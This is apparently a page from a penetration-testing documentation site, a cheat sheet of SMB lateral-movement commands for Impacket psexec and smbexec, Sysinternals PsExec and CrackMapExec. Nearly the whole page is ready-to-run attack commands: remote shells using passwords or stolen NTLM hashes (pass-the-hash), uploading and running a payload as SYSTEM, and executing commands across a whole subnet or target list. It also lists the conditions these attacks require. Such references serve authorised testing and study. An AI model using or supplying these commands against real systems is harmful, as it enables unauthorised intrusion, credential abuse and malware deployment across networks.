Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Impacket — psexec
impacket-psexec DOMAIN/user:password@TARGET
impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-psexec DOMAIN/user:password@TARGET -codec 437 # Fix encoding
Impacket — smbexec
impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Sysinternals PsExec
PsExec.exe \\TARGET -u DOMAIN\user -p password cmd.exe
PsExec.exe \\TARGET -u DOMAIN\user -p password -s cmd.exe # SYSTEM
PsExec.exe \\TARGET -u DOMAIN\user -p password -c payload.exe # Upload & exec
Accept EULA
PsExec.exe -accepteula \\TARGET cmd.exe
CrackMapExec
crackmapexec smb TARGET -u user -p password -x "whoami" # CMD
crackmapexec smb TARGET -u user -p password -X "Get-Process" # PowerShell
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
Multiple Targets
crackmapexec smb 10.10.10.0/24 -u admin -p password -x "whoami"
crackmapexec smb targets.txt -u admin -H HASH -x "whoami"
Requirements
- Admin rights on target
- SMB (445) accessible
- ADMINorC share writable (psexec)
- File and Printer Sharing enabled
Quick Reference
| Tool | Command |
|---|
| Impacket psexec | impacket-psexec DOMAIN/user:pass@TARGET |
| Impacket smbexec | impacket-smbexec DOMAIN/user:pass@TARGET |
| Sysinternals | PsExec.exe \\TARGET -u user -p pass cmd |
| CME | crackmapexec smb TARGET -u user -p pass -x "cmd" |